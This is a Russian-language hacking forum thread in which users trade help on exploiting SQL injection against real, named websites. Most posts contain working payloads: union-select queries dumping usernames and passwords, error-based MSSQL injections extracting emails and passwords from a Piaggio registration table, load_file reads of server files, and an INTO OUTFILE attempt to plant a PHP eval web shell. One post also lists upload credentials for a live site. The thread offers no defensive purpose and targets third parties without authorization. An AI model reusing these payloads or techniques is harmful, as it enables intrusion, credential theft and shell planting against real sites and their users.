PHP: Сообщение от sabe http://www.skintologyny.com/admin/login.php http://www.skintologyny.com/products_details.php?id=-32+union+select+1,concat_ws(0x3a,username,password ),3,4,5,6,7,8,9,10,11,12,13+from+users%23 почему не могу войти? это ведь не от блога пароли указал а от users... а wp_users я не нашел такую таблицу в куррент дб, может кто угадает базу где блог.. а вторая ссылка что ты скинул это верифай логин походу одно и то же что вход в админку почему не пускает оч интересно проблема не решена помогите узнать ответ)
Добрый день, подскажите, что это за БД такая, с рашрирениями файлов *.bcp, *.idx, *.pre и *.sch Спасибо
Подскажите что делать далее? Вот нашлась уязвимость: Source: Form Method: POST Parameter Name Parameter Type Test Name Severity + userid POST SQL Injection (blind test) High + submit POST SQL Injection (blind test) High + m2hp COOKIE SQL Injection (blind test) High Как поступать дальше?
День добрый! Есть ли возможность залить исполняймый файл в данном месте Code: http://play-me.ru/users/fileupload/edit Login:fileupload pass:fileupload
Есть уязвимый сайт: Code: http://www.site.com/?parametr1=parametr2&id=-99' при Code: +union+select+1,2+from+MSysModules2%00# и так далее выходит вот такая ошибка: Кто знает как раскурить такую скулю и в чем вообще проблма с ней?
Есть скуль такого вида: site.ru/ask.php?page=ask&cid=2+union+select+1,2,3,4,5,6 Выводимые поля 2,5,6 Делаю запрос такого вида чтобы определить file_priv(пробел вставляет форум, без моего участия) site.ru/ask.php?page=ask&cid=2+union+select+1,File_Priv,3,4,5,6+from+mysql.user+where+user='ask_user' На что получаю ошибку Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203 Вопрос: Каким макаром сделать чтобы он мне вывел file_priv конкретного юзера?
попробовал load_file и так и сяк и в хэксе - не показыват ничего и ошибок нету Через софт вот таким запросом выводит содержимое таблицы site.ru/ask.php?page=ask&cid=999999.9+union+all+select+(select+concat(0x7e,0x27,unhex(Hex(cast(cms_config.config_name+as+char))),0x27,0x7e)+from+`site_db`.cms_config+limit+0,1)+,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536,0x31303235343830303536-- Както выводит содержимое нормально...Но как вывести этот file_priv то?
файл прив так PHP: site.ru/ask.php?page=ask&cid=2+union+select+1,File_Priv,3,4,5,6+from+mysql. user+limit+0,1 и так далее перебираешь лимит пока не переберёшь всех юзеров, хотя не понимаю нафиг оно тебе нужно. если ковычки не фильтруются то спокойно можно лить шелл, а и на будушие, черз лоад файл если ничего не выводится и нет ошибки это потому что содержимое файла сильно большое, его нужно по кускам выводить PHP: site.ru/ask.php?page=ask&cid=2+union+select+1,substr(load_file('какойто файл'),1,99),3,4,5,6 и так дальше перебераешь
Всем привет! подскажите кто знает как правильно составить запрос чтоб работал оператор LIKE в запросе я хочу чтоб запрос вывел мне таблицу в которой есть интересующие меня колонки например email pass и т.д как получить структуру, колонки и содержимое таблиц я знаю но вот с LIKE у меня не получается не могу понять почему чтобы было понятнее я хочу рассмотреть на примере HTML: http://www.piaggio.com/info.asp?BR=GILERA&CD=' есть инъекция HTML: http://www.piaggio.com/info.asp?BR=GILERA&CD=1%27)%20or%201%3D(select%20top%201%20%2Bcast(us erid%20as%20nvarchar)%2Bchar(0x7e)%2Bcast(email%20 as%20nvarchar)%2Bchar(0x7e)%2Bcast(userpassword%20 as%20nvarchar)%20from%20Piaggio..tbSSORegistration %20where%20userid%3E1)-- Conversion failed when converting the nvarchar value '[email protected].~???.......... ............' to data type int. в базе Piaggio есть таблица tbSSORegistration и есть колонки email и userpassword пробую через LIKE вывести имя таблицы в которой есть колонка emai HTML: http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT sysobjects.name as tablename,syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE 'email' )-- выводит Only one expression can be specified in the select list when the subquery is not introduced with EXISTS. пробовал указать базу HTML: http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT Piaggio..sysobjects.name as tablename,Piaggio..syscolumns.name as columnname FROM Piaggio..sysobjects JOIN Piaggio..syscolumns ON Piaggio..sysobjects.id = Piaggio..syscolumns.id WHERE sysobjects.xtype = 'U' AND Piaggio..syscolumns.name LIKE 'email' )-- пробовал и так HTML: http://www.piaggio.com/info.asp?BR=GILERA&CD=')%20or%201=(select%20top%201%20table_name%20fr om%20information_schema.tables%20where%20table_nam e%20like%20'%25email%25')-- подскажите плз кто знает как правильно запрос составить с LIKE
Файл Прив нужен хотя бы чтобы узнать стоит ли возиться с данным сайтом или нафиг выбросить. Попробовал напрямую залиться, но всё пусто(( site.ru/ask.php?page=ask&cid=2+union+select+1,`<?php eval($_REQUEST[cmd]); ?>`,3,4,5,6+from+mysql.user+into+outfile+`/home/site/subdomains/t44/www/images/1.php` Кавычки использовал прямые ' и косые ` и так и этак выдает ошибку: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203 Перебор лимитом тоже не помогает при выводе файл прив. Лоад файл тоже не помогает как ты указал, выдает ошибки: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/site/public_html/ask.php on line 203
Помогите, пожалуйста, пока мозг не взорвался) Уязвимость - error based в POST запросе, но параметра такого вида: cell_coordinates=1_11, два числа, разделенных нижним подчеркиванием, координаты. И имя базы, и версия выводятся нормально: запрос: ответ: Но, как только идет запрос с "_", сразу вываливается синтаксическая ошибка, видимо поэтому с information_schema не получается вытащить имена таблиц, перебором нашел единственную таблицу items, ее данные вытаскиваются хорошо, но сайт на dle и все остальные таблицы с префиксом, и их даже перебором не подобрать: подбор без префикса ответ: с префиксом: ответ: Видимо параметр разделяется на два по нижнему подчеркиванию "_", и при наличии его в инъекции все идет хз как, как от него можно избавиться? Несколько страниц назад была такая же проблема, там советовали менять _ на %255f или %5f, не помогает
Добрый вечер. нашел слепую скулю, раньше с ними не встречался... хавиж ее перебирает как-то так - Начал он переберать с спецсимволов, а база логинов там на пару тысяч + жует кирилицу, выдает вместо нее ???. Ник админа заранее известен. Как вытащить его данные?
Попробуй sqlmap, он намного лучше работает с кириллицей и вообще с кодировками, если лень - кинь в ЛС где и что, попробую помочь, хоть отвлекусь от своей "уязвимости" немного)
